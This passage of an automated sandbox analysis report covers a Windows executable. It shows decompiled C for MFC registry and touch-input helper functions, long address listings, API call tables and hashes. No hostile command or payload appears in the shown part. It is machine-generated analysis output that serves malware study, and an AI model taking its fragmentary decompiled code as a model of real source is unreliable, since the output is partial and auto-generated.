                                                                                                                0x01265261
                                                                                                                0x01265263
                                                                                                                0x01265265
                                                                                                                0x0126526c
                                                                                                                0x0126526e
                                                                                                                0x0126526e
                                                                                                                0x0126526c
                                                                                                                0x01265263
                                                                                                                0x01265293
                                                                                                                0x01265293
                                                                                                                0x0126522c
                                                                                                                0x0126522c
                                                                                                                0x0126522f
                                                                                                                0x00000000
                                                                                                                0x01265231
                                                                                                                0x01265231
                                                                                                                0x01265234
                                                                                                                0x01265296
                                                                                                                0x01265296
                                                                                                                0x0126529b
                                                                                                                0x012652ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01265234
                                                                                                                0x0126522f
                                                                                                                0x012651ff
                                                                                                                0x012651ff
                                                                                                                0x01265205
                                                                                                                0x01265207
                                                                                                                0x01265211
                                                                                                                0x01265211
                                                                                                                0x01265215
                                                                                                                0x01265215
                                                                                                                0x012651df
                                                                                                                0x012651df
                                                                                                                0x012651e2
                                                                                                                0x00000000
                                                                                                                0x012651e4
                                                                                                                0x012651eb
                                                                                                                0x012651eb
                                                                                                                0x012651e2
                                                                                                                0x012651b5
                                                                                                                0x012651b9
                                                                                                                0x012651bf
                                                                                                                0x012651c1
                                                                                                                0x012651c2
                                                                                                                0x012651c4
                                                                                                                0x01273d3a
                                                                                                                0x01273d3d
                                                                                                                0x01273d3f
                                                                                                                0x01273d45
                                                                                                                0x01273d63
                                                                                                                0x01273d63
                                                                                                                0x01273d65
                                                                                                                0x01273d67
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01273d57
                                                                                                                0x01273d59
                                                                                                                0x01273d5b
                                                                                                                0x01273dce
                                                                                                                0x01273dd1
                                                                                                                0x01273d5d
                                                                                                                0x01273d5e
                                                                                                                0x00000000
                                                                                                                0x01273d5e
                                                                                                                0x00000000
                                                                                                                0x01273d5b
                                                                                                                0x01273d69
                                                                                                                0x01273d87
                                                                                                                0x01273d87
                                                                                                                0x01273d89
                                                                                                                0x01273d8b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01273d7b
                                                                                                                0x01273d7d
                                                                                                                0x01273d7f
                                                                                                                0x00000000
                                                                                                                0x01273d81
                                                                                                                0x01273d82
                                                                                                                0x00000000
                                                                                                                0x01273d82
                                                                                                                0x00000000
                                                                                                                0x01273d7f
                                                                                                                0x01273d8d
                                                                                                                0x01273d8f
                                                                                                                0x01273d94
                                                                                                                0x01273d96
                                                                                                                0x01273dd2
                                                                                                                0x01273dd7
                                                                                                                0x01273dd8
                                                                                                                0x01273dd9
                                                                                                                0x01273ddb
                                                                                                                0x01273dea
                                                                                                                0x01273def
                                                                                                                0x01273df5
                                                                                                                0x01273df9
                                                                                                                0x01273df9
                                                                                                                0x01273df9
                                                                                                                0x01273dfe
                                                                                                                0x01273d98
                                                                                                                0x01273d9b
                                                                                                                0x01273db7
                                                                                                                0x01273db7
                                                                                                                0x01273db9
                                                                                                                0x01273dbb
                                                                                                                0x01273dbd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01273dab
                                                                                                                0x01273dad
                                                                                                                0x01273daf
                                                                                                                0x01273db2
                                                                                                                0x00000000
                                                                                                                0x01273db2
                                                                                                                0x00000000
                                                                                                                0x01273daf
                                                                                                                0x01273dcc
                                                                                                                0x00000000
                                                                                                                0x01273dcc
                                                                                                                0x012651ca
                                                                                                                0x01273d06
                                                                                                                0x01273d07
                                                                                                                0x01273d09
                                                                                                                0x01273d0f
                                                                                                                0x01273d11
                                                                                                                0x01273d34
                                                                                                                0x00000000
                                                                                                                0x01273d13
                                                                                                                0x01273d13
                                                                                                                0x01273d18
                                                                                                                0x01273d1a
                                                                                                                0x01273d2c
                                                                                                                0x01273d2c
                                                                                                                0x01273d33
                                                                                                                0x01273d33
                                                                                                                0x01273d11
                                                                                                                0x012651c4
                                                                                                                0x01265195
                                                                                                                0x0126519b
                                                                                                                0x0126519f
                                                                                                                0x012651a1
                                                                                                                0x00000000
                                                                                                                0x012651a2
                                                                                                                0x012651a8
                                                                                                                0x012651a8
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • SetCursor.USER32 ref: 0126525B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CursorException@8Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 442572300-0
                                                                                                                • Opcode ID: 195890df70b2273571cffde8ed439811fd89b66524a86d5ecfaf1e068748fca5
                                                                                                                • Instruction ID: 3717a90ed28110f4aaa2e12910c5cbf61f1a1bc8a179a5972ae9330fc0590fc8
                                                                                                                • Opcode Fuzzy Hash: 195890df70b2273571cffde8ed439811fd89b66524a86d5ecfaf1e068748fca5
                                                                                                                • Instruction Fuzzy Hash: 88310131321623EBEB32A728DC44FBB3699BF40B54F144164FB05EB1D0DBB2D8819694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126576A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E0126576A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t48;
				intOrPtr _t54;
				long _t55;
				void* _t62;
				void* _t65;
				signed int _t69;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t86;

				_t80 = __edx;
				_push(0x12c);
				E01285C19(E01296F08, __ebx, __edi, __esi);
				_t82 =  *((intOrPtr*)(_t86 + 0x10));
				_t69 =  *(_t86 + 8);
				 *(_t86 - 0x12c) = _t69;
				 *((intOrPtr*)(_t86 - 0x130)) = _t82;
				 *((intOrPtr*)(_t86 - 0x134)) = _t82;
				_t7 = E01263BB9(_t69, _t82, __esi,  *((intOrPtr*)( *((intOrPtr*)(_t86 + 0xc)))) - 0x10) + 0x10; // 0x10
				_t85 = _t7;
				 *((intOrPtr*)(_t86 - 0x128)) = _t85;
				 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
				if(_t69 == 0x80000000) {
					_t62 = E012692F3();
					_t91 = _t62 - 1;
					if(_t62 == 1) {
						_push(_t86 - 0x128);
						_push("Software\\Classes\\");
						_push(_t86 - 0x120);
						_t65 = E01265706(_t69, _t82, _t85, _t91);
						 *(_t86 - 4) = 1;
						E0126379B(_t86 - 0x128, _t65);
						 *(_t86 - 4) = 0;
						E012615E0( *((intOrPtr*)(_t86 - 0x120)) - 0x10, _t80);
						_t85 =  *((intOrPtr*)(_t86 - 0x128));
						_t69 = _t69 + 1;
						 *(_t86 - 0x12c) = _t69;
					}
				}
				_push(_t86 - 0x124);
				_push(0x2001f);
				_push(0);
				_push(_t85);
				_push(_t69);
				if(_t82 == 0) {
					_t48 = RegOpenKeyExA();
				} else {
					_t48 = E01264EDF(_t82);
				}
				_t83 = _t48;
				if(_t48 == 0) {
					while(1) {
						_t83 = RegEnumKeyA( *(_t86 - 0x124), 0, _t86 - 0x11c, 0x104);
						_t95 = _t83;
						if(_t83 != 0) {
							break;
						}
						 *(_t86 - 4) = 2;
						_push(_t86 - 0x11c);
						E0126337D(_t69, _t86 - 0x120, _t83, _t85, _t95);
						 *(_t86 - 4) = 3;
						_t83 = E0126576A(_t69, _t80, _t83, _t85, _t95,  *(_t86 - 0x124), _t86 - 0x120,  *((intOrPtr*)(_t86 - 0x130)));
						_t69 = _t69 & 0xffffff00 | _t83 != 0x00000000;
						E012615E0( *((intOrPtr*)(_t86 - 0x120)) - 0x10, _t80);
						if(_t69 == 0) {
							 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
							continue;
						} else {
							 *(_t86 - 4) = 0;
						}
						break;
					}
					_t54 =  *((intOrPtr*)(_t86 - 0x130));
					_t69 =  *(_t86 - 0x12c);
					if(_t83 == 0x103 || _t83 == 0x3f2) {
						_push(_t85);
						_push(_t69);
						if(_t54 == 0) {
							_t55 = RegDeleteKeyA();
						} else {
							_t55 = E0126599E(_t54);
						}
						_t83 = _t55;
					}
					RegCloseKey( *(_t86 - 0x124));
				}
				_t40 = _t85 - 0x10; // 0x0
				E012615E0(_t40, _t80);
				return E01285B6B(_t69, _t83, _t85);
			}













                                                                                                                0x0126576a
                                                                                                                0x0126576a
                                                                                                                0x01265774
                                                                                                                0x0126577c
                                                                                                                0x0126577f
                                                                                                                0x01265782
                                                                                                                0x0126578d
                                                                                                                0x01265794
                                                                                                                0x012657a0
                                                                                                                0x012657a0
                                                                                                                0x012657a3
                                                                                                                0x012657a9
                                                                                                                0x012657b3
                                                                                                                0x012657b5
                                                                                                                0x012657ba
                                                                                                                0x012657bd
                                                                                                                0x012657c5
                                                                                                                0x012657cc
                                                                                                                0x012657d1
                                                                                                                0x012657d2
                                                                                                                0x012657e1
                                                                                                                0x012657e5
                                                                                                                0x012657f0
                                                                                                                0x012657f7
                                                                                                                0x012657fc
                                                                                                                0x01265802
                                                                                                                0x01265803
                                                                                                                0x01265803
                                                                                                                0x012657bd
                                                                                                                0x0126580f
                                                                                                                0x01265810
                                                                                                                0x01265815
                                                                                                                0x01265817
                                                                                                                0x01265818
                                                                                                                0x0126581b
                                                                                                                0x01265826
                                                                                                                0x0126581d
                                                                                                                0x0126581f
                                                                                                                0x0126581f
                                                                                                                0x0126582c
                                                                                                                0x01265830
                                                                                                                0x01265836
                                                                                                                0x01265850
                                                                                                                0x01265852
                                                                                                                0x01265854
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126585c
                                                                                                                0x01265860
                                                                                                                0x01265867
                                                                                                                0x01265878
                                                                                                                0x0126588e
                                                                                                                0x01265892
                                                                                                                0x01265898
                                                                                                                0x0126589f
                                                                                                                0x012658d0
                                                                                                                0x00000000
                                                                                                                0x012658a1
                                                                                                                0x012658a1
                                                                                                                0x012658a1
                                                                                                                0x00000000
                                                                                                                0x0126589f
                                                                                                                0x012658a5
                                                                                                                0x012658ab
                                                                                                                0x012658b7
                                                                                                                0x012658c1
                                                                                                                0x012658c2
                                                                                                                0x012658c5
                                                                                                                0x0126590c
                                                                                                                0x012658c7
                                                                                                                0x012658c9
                                                                                                                0x012658c9
                                                                                                                0x01265912
                                                                                                                0x01265912
                                                                                                                0x0126591a
                                                                                                                0x0126591a
                                                                                                                0x01265920
                                                                                                                0x01265923
                                                                                                                0x0126592f

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 01265774
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,00000010,00000000,0002001F,?,0000012C), ref: 01265826
                                                                                                                  • Part of subcall function 01265706: __EH_prolog3.LIBCMT ref: 0126570D
                                                                                                                  • Part of subcall function 01265706: _strlen.LIBCMT ref: 01265747
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0126584A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0126591A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumH_prolog3H_prolog3_catch_Open_strlen
                                                                                                                • String ID: Software\Classes\
                                                                                                                • API String ID: 1951977290-1121929649
                                                                                                                • Opcode ID: deef62c1df618af5a07b191b54b36080a6d1875c3becfe231ce5f9e9dab48613
                                                                                                                • Instruction ID: 3f8fe9e777759b2e404b8cc2ec1bcc4d1cafd26c286e1210c2d4dc7bf49969e7
                                                                                                                • Opcode Fuzzy Hash: deef62c1df618af5a07b191b54b36080a6d1875c3becfe231ce5f9e9dab48613
                                                                                                                • Instruction Fuzzy Hash: 59416A7192121A9BDF22DB68CC94BEDB7B8BF58360F140099D649A72C1DA309ED4CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012659F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E012659F0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				void* _t47;
				long _t61;
				void* _t67;
				void* _t83;
				void* _t84;
				intOrPtr _t92;

				_t70 = __ecx;
				_t69 = __ebx;
				_push(0x124);
				E01285BAD(E01296F51, __ebx, __edi, __esi);
				_t83 = __ecx;
				 *(_t84 - 0x120) = 0;
				 *(_t84 - 0x12c) = 0;
				_t37 = E01265979(__ecx);
				 *((intOrPtr*)(_t84 - 0x128)) = _t37;
				if(_t37 != 0) {
					do {
						_t70 = _t83;
						_push(_t84 - 0x128);
						_t67 = E01265988(_t83);
						if(_t67 != 0) {
							_t79 =  *_t67;
							_t70 = _t67;
							 *((intOrPtr*)( *_t67 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t84 - 0x128)) != 0);
				}
				if( *((intOrPtr*)(_t83 + 0x58)) != 0) {
					_t92 =  *((intOrPtr*)(_t83 + 0x6c));
					_t93 = _t92 == 0;
					if(_t92 == 0) {
						E01268275(_t70);
					}
					_push("Software\\");
					E0126337D(_t69, _t84 - 0x11c, 0, _t83, _t93);
					 *((intOrPtr*)(_t84 - 4)) = 0;
					E01263A37(_t69, _t84 - 0x11c,  *((intOrPtr*)(_t83 + 0x58)));
					_push("\\");
					_push(_t84 - 0x11c);
					_push(_t84 - 0x130);
					_t47 = E012656A7(_t69, 0, _t83, _t93);
					_push( *((intOrPtr*)(_t83 + 0x6c)));
					 *((char*)(_t84 - 4)) = 1;
					_push(_t47);
					_push(_t84 - 0x124);
					E012656A7(_t69, 0, _t83, _t93);
					 *((char*)(_t84 - 4)) = 3;
					E012615E0( *((intOrPtr*)(_t84 - 0x130)) - 0x10, _t79);
					_push(0);
					_t83 = 0x80000001;
					_push(_t84 - 0x124);
					_push(0x80000001);
					E0126576A(_t69, _t79, 0, 0x80000001, _t93);
					if(RegOpenKeyExA(0x80000001,  *(_t84 - 0x11c), 0, 8, _t84 - 0x120) == 0) {
						_t61 = RegEnumKeyA( *(_t84 - 0x120), 0, _t84 - 0x118, 0x104);
						_t95 = _t61 - 0x103;
						if(_t61 == 0x103) {
							_push(0);
							_push(_t84 - 0x11c);
							_push(0x80000001);
							E0126576A(_t69, _t79, 0, 0x80000001, _t95);
						}
						RegCloseKey( *(_t84 - 0x120));
					}
					RegQueryValueA(_t83,  *(_t84 - 0x124), _t84 - 0x118, _t84 - 0x12c);
					E012615E0( &(( *(_t84 - 0x124))[0xfffffffffffffff0]), _t79);
					E012615E0( &(( *(_t84 - 0x11c))[0xfffffffffffffff0]), _t79);
				}
				return E01285B5C(_t69, 0, _t83);
			}










                                                                                                                0x012659f0
                                                                                                                0x012659f0
                                                                                                                0x012659f0
                                                                                                                0x012659fa
                                                                                                                0x012659ff
                                                                                                                0x01265a03
                                                                                                                0x01265a09
                                                                                                                0x01265a0f
                                                                                                                0x01265a14
                                                                                                                0x01265a1c
                                                                                                                0x01265a1e
                                                                                                                0x01265a24
                                                                                                                0x01265a26
                                                                                                                0x01265a27
                                                                                                                0x01265a2e
                                                                                                                0x01265a30
                                                                                                                0x01265a32
                                                                                                                0x01265a39
                                                                                                                0x01265a39
                                                                                                                0x01265a3c
                                                                                                                0x01265a1e
                                                                                                                0x01265a47
                                                                                                                0x01265a4f
                                                                                                                0x01265a55
                                                                                                                0x01265a57
                                                                                                                0x01265a59
                                                                                                                0x01265a59
                                                                                                                0x01265a5e
                                                                                                                0x01265a69
                                                                                                                0x01265a77
                                                                                                                0x01265a7a
                                                                                                                0x01265a7f
                                                                                                                0x01265a8a
                                                                                                                0x01265a91
                                                                                                                0x01265a92
                                                                                                                0x01265a97
                                                                                                                0x01265a9a
                                                                                                                0x01265a9e
                                                                                                                0x01265aa5
                                                                                                                0x01265aa6
                                                                                                                0x01265ab4
                                                                                                                0x01265abb
                                                                                                                0x01265ac0
                                                                                                                0x01265ac7
                                                                                                                0x01265acc
                                                                                                                0x01265acd
                                                                                                                0x01265ace
                                                                                                                0x01265aec
                                                                                                                0x01265b01
                                                                                                                0x01265b07
                                                                                                                0x01265b0c
                                                                                                                0x01265b0e
                                                                                                                0x01265b15
                                                                                                                0x01265b16
                                                                                                                0x01265b17
                                                                                                                0x01265b17
                                                                                                                0x01265b22
                                                                                                                0x01265b22
                                                                                                                0x01265b3d
                                                                                                                0x01265b4c
                                                                                                                0x01265b5a
                                                                                                                0x01265b5a
                                                                                                                0x01265b67

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 012659FA
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000008,?), ref: 01265AE4
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 01265B01
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01265B22
                                                                                                                • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 01265B3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                                • String ID: Software\
                                                                                                                • API String ID: 1666054129-964853688
                                                                                                                • Opcode ID: 21dc461a2253a6335cde3bd23f1497143d3153ad285be05a93c9458529ba47a4
                                                                                                                • Instruction ID: 8c38d72a7d7587e86cce50870ad294c1f8db592567e999b61185726de016f5e8
                                                                                                                • Opcode Fuzzy Hash: 21dc461a2253a6335cde3bd23f1497143d3153ad285be05a93c9458529ba47a4
                                                                                                                • Instruction Fuzzy Hash: 0541503192021AABDF25EB64CC84EFEB6BCAF59350F0001D9A645A2190DB309ED1CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126C477, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 0126C4A8
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 0126C4E4
                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 0126C508
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Exception@8HandleModuleThrow
                                                                                                                • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
                                                                                                                • API String ID: 2144170044-1853737257
                                                                                                                • Opcode ID: 584b0477c6778a7d1fad8ac9ae1db1fee345fc9dbc8f9394cb17d9e576c5b5b3
                                                                                                                • Instruction ID: ac6fff5982fbd6cb7cc82c57a3bc91f01906ed9a8cc0fdc9fb149b0a8a547750
                                                                                                                • Opcode Fuzzy Hash: 584b0477c6778a7d1fad8ac9ae1db1fee345fc9dbc8f9394cb17d9e576c5b5b3
                                                                                                                • Instruction Fuzzy Hash: 1F217535B253019FDF3AAB6DBC44B7D379DEB857A4B80002AE645E72D4DB60D8D08760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264A35, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 01264A70
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 01264A9C
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 01264AC8
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01264ADD
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01264AE8
                                                                                                                  • Part of subcall function 01264EDF: GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,01264A6E,80000001,software,00000000,0002001F,?), ref: 01264EEF
                                                                                                                  • Part of subcall function 01264EDF: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 01264EFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                                                                • String ID: software
                                                                                                                • API String ID: 550756860-2010147023
                                                                                                                • Opcode ID: 16cf8f7ced1a0384a39257aa473d6e586f24d51d4288d9602d2e31031aec93ef
                                                                                                                • Instruction ID: 8642b32131e9718d1ec2d892811c4fc39bc7396b33c8b851721d64d22fe6ef71
                                                                                                                • Opcode Fuzzy Hash: 16cf8f7ced1a0384a39257aa473d6e586f24d51d4288d9602d2e31031aec93ef
                                                                                                                • Instruction Fuzzy Hash: D5215072A20159FBEF21EE98DC55EBFBB7DEB44710F004169BA41E2140D7319E80DBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126D1F6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(user32.dll,?,?,?,?,?,?,?,0126BAE6,00000000,00000000), ref: 0126D216
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 0126D24B
                                                                                                                • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 0126D27E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Exception@8HandleModuleThrow
                                                                                                                • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                                                                                                • API String ID: 2144170044-2470269259
                                                                                                                • Opcode ID: 31adea36f612477922c7be20d5e2d2c999e8558f73df9470df61c458516c51bf
                                                                                                                • Instruction ID: 2a2e28eb0fce1ab9e358310ae75bf232f489ff75abf7f037a292cba97e11ace1
                                                                                                                • Opcode Fuzzy Hash: 31adea36f612477922c7be20d5e2d2c999e8558f73df9470df61c458516c51bf
                                                                                                                • Instruction Fuzzy Hash: 2221B234B2030D9FDF259FA9E544B7A37ADFB88339F504429E94693289D370E880CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126FEDE, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RealChildWindowFromPoint.USER32(?,?,?), ref: 0126FF02
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0126FF1D
                                                                                                                • GetWindow.USER32(?,00000005), ref: 0126FF77
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$ChildClientFromPointRealScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2518355518-0
                                                                                                                • Opcode ID: af679adaa69a45e113278fe0f4e6bf23341af8915758846b63d9b34f433c9ff0
                                                                                                                • Instruction ID: 2c0f9faefb5d215df6c902dd230c42c65d9746fb7d0f2cdadbe288ebcda262a6
                                                                                                                • Opcode Fuzzy Hash: af679adaa69a45e113278fe0f4e6bf23341af8915758846b63d9b34f433c9ff0
                                                                                                                • Instruction Fuzzy Hash: E8212F7191111AABDF11DFACB9099AEBBBCFF09614B144129F511D3284EB349A41CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01288D80, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 01288D80
                                                                                                                  • Part of subcall function 0128615A: RtlEncodePointer.NTDLL(00000000,?,01288D85,01283765,012A7630,00000014), ref: 0128615D
                                                                                                                  • Part of subcall function 0128615A: __initp_misc_winsig.LIBCMT ref: 01286178
                                                                                                                  • Part of subcall function 0128615A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 012898BF
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 012898D3
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 012898E6
